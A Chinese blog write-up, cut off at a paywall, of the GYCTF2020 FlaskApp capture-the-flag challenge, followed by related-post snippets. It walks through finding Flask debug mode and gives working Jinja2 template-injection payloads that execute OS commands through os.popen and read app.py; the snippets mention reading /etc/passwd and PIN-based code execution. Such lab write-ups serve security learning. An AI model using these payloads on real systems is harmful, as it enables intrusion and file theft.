GYCTF2020 FlaskApp

最新推荐文章于 2025-11-06 15:10:30 发布
原创 最新推荐文章于 2025-11-06 15:10:30 发布 · 2k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #安全 #安全漏洞

这篇博客详细介绍了如何利用GYCTF2020 FlaskApp中的安全漏洞,特别是Server-Side Template Injection (SSTI)。作者通过信息收集发现开启了debug模式,从而能读取部分源代码。接着,作者演示了如何通过字符串拼接和倒序输出绕过WAF,读取到flag。此外,还解释了如何利用PIN码进行远程代码执行(RCE),涉及对系统信息的获取和计算。

GYCTF2020 FlaskApp,老规矩,还是buu的平台

知识点

  • flask的SSTI
  • ssti的绕过(拼接字符串,倒序切片,内置对象、函数)
  • pin码的生成

信息收集

因为题目名flask,所以先不进行常规信息收集,而是观察功能点,寻找易发生ssti的功能
在这里插入图片描述
提示里貌似没有什么信息,考虑到功能异常抛出常见于解密环节,所以随便输段不能解密的
在这里插入图片描述
直接报错抛出debug信息,看来是开启了debug模式
参见该文章:Flask开启debug模式等于给黑客留了后门
而且读到了app.py的部分代码
大致的逻辑就是获取text参数,进行解密,如果可以过waf则执行代码

@app.route('/decode',methods=['POST','GET'])
def decode():
    if request.values.get('text') :
        text = request.values.get("text")
        text_decode = base64.b64decode(text.encode())
        tmp = "结果 : {0}".format(text_decode.decode())
        if waf(tmp) :
            flash("no no no !!")
            return redirect(url_for('decode'))
        res =  render_template_string(tmp)

在这里插入图片描述
进一步尝试是否ssti,在加密界面对{ {6*6}}进行加密,结果为e3s2KjZ9fQ==,再在解密界面进行解密,疑似是有一定防御,那么换成{ {3+3}},成功返回在这里插入图片描述
在这里插入图片描述
说明确实存在ssti,接下来就是具体怎么利用的过程了

预备知识

在jinja2中 控制结构 {% %} 变量取值 { { }}
函数和属性

__class__         返回调用的参数类型
__bases__         返回基类列表 
__mro__           此属性是在方法解析期间寻找基类时的参考类元组 
__subclasses__()  返回子类的列表 
__globals__       以字典的形式返回函数所在的全局命名空间所定义的全局变量,与 func_globals 等价 
__builtins__      内建模块的引用,在任何地方都是可见的(包括全局),每个 Python 脚本都会自动加载,这个模块包括了很多强大的 built-in 函数,例如eval, exec, open等等

python内建函数文档

具体利用

直接读flag

首先想办法把完整的app.py读出来,方便绕waf
参考Templates Injections的payload

方便阅读我把它换行了

{
   
   % for x in ().__class__.__base__.__subclasses__() %}
{
   
   % if "warning" in x.__name__ %}
{
   
   {
   
   x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}
{
   
   %endif%}{
   
   %endfor%}

修改成

{
   
   % for c in [].__class__.__base__.__subclasses__() %}
{
   
   % if c.__name__=='catch_warnings' %}
{
   
   {
   
    c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{
   
   % endif %}{
   
   % endfor %}

记得最后要改成一行

{
   
   % for c in [].__class__.__base__.__subclasses__() %}{
   
   % if c.__name__=='catch_warnings' %}{
   
   {
   
    c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{
   
   % endif %}{
   
   % endfor %}

然后加密解密
得到结果

from flask import Flask,render_template_string from flask import render_template,request,flash,redirect,url_for from flask_wtf import FlaskForm from wtforms import StringField, SubmitField from wtforms.validators import DataRequired from flask_bootstrap import Bootstrap import base64 app = Flask(__name__) app.config['SECRET_KEY'] = 's_e_c_r_e_t_k_e_y' bootstrap = Bootstrap(app) class NameForm(FlaskForm): text = StringField('BASE64加密',validators= [DataRequired()]) submit = SubmitField('提交') class NameForm1(FlaskForm): text = StringField(&#39
最低0.47元/天 解锁文章
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1595
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
[GYCTF2020]FlaskApp
missht0的博客
01-31 609
[GYCTF2020]FlaskApp 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。 debug模式的情况下可以抛出详细异常信息 base64解密界面随意输入字符串,导致解码报错 提示存在ssti注入 flask模板注入框架 查看根目录 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__glo
CTF 刷题必备!CTFer 高频工具实战清单(直接收藏套用)
最新发布
2401_84760527的博客
11-06 1208
本文整理了CTF比赛中常用的15款工具,涵盖编码解码、加解密、取证分析等多个领域。重点推荐CyberChef(多功能编码转换)、ToolsFx(跨平台密码学工具箱)、BurpSuite(渗透测试工具)、Wireshark(网络封包分析)等核心工具,每款工具均提供下载地址和功能简介。这些工具可有效辅助参赛者解决CTF中的各类密码学、逆向工程、取证分析等题目,提升解题效率。
[GYCTF2020]FlaskApp 1
ubaichu的博客
07-13 1369
[GYCTF2020]FlaskApp 1 详细解题过程
BUUCTF-[GYCTF2020]FlaskApp flask爆破pin
m0_64180167的博客
12-07 1377
这道题不需要爆破也可以getshellssti都给你了但是学习记录一下pin的获取首先就是通过base加密后 当base64解密的时候 会造成ssfr这里过滤了 * 所以使用 {{7+7}} 实现然后我们开始看看源代码可以发现HINT 下存在pin所以是找pin这里我们开始在解密随便输入内容报错了 然后我们可以看源代码这里可以发现没啥内容 但是有waf首先通过读取读取一下/etc/passwd。
web buuctf [GYCTF2020]FlaskApp
weixin_44214568的博客
04-12 4707
知识点:1.flask的debug模式漏洞 2.flask字符拼接漏洞 1.开题 2.提示flask了,那不得不试一试SSTI 在加密内输入{{7*7}} ,生成base64码e3s3Kjd9fcKg; 将e3s3Kjd9fcKg输入到解码框内,显示no no no说明存在防御 换一个输入{{7+7}},base64码为e3s3Kzd9fQ==,解码后,显示的是14 综上存在SSTI 3.看提示页面,没啥东西,在解密页面(因为解密存在SSTI)再随便输入些字母,...
BUUCTF:[GYCTF2020]FlaskApp
末初 · mochu7
09-19 2231
BUUCTF:[GYCTF2020]FlaskApp Writeup
[GYCTF2020]FlaskApp(SSTI)
qq_45521281的博客
06-09 3594
进入题目: 是一个用flask写的一个base64加解密应用。有一个加密页面和解密页面,思路应该是在加密页面输入payload进行加密,加密结果在解密页面进行解密,输出解密后的payload被渲染到页面输出后执行了payload。 官方write up说看到根据hint1,失败乃成功之母,应该能想到flask的debug模式。但是我当时看到的时候并没有想到是debug模式,这就是没有进行足够积累的后果。 base64decode在不会解析的时候就会报错,然后习惯性对base64解密页面进行报错实验,ba
[GYCTF2020]FlaskApp1
2303_77961060的博客
05-09 486
在jinja2模板引擎当中存在下面几个模板,而在这些模板当中可以输入值以及一些控制语句,在jinja2引擎中有两个模板渲染函数,而SSTI注入的原因是由于。通过源代码的框架可以判断是Flask,Flask是使用python编写的一个轻量级的web应用框架,模板引擎使用的是jinja2,遵循MVC模型。可以看到返回有this_is_the_flag.txt,然后对其进行读取,构造。的不正确的使用以及没有对用户输入的数据进行有效的过滤导致的.构造{{config}},先加密,再把加密结果解密,结果输出。
buuoj FlaskApp
03-18
根据 GYCTF2020 的一道名为 FlaskApp 的赛题描述可知,选手需要找到隐藏于应用内部逻辑里的 WAF 函数实现细节,并绕过防护措施完成特定目标。此过程不仅考验参赛者的逆向工程能力,同时也要求具备扎实的编程功底以便...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值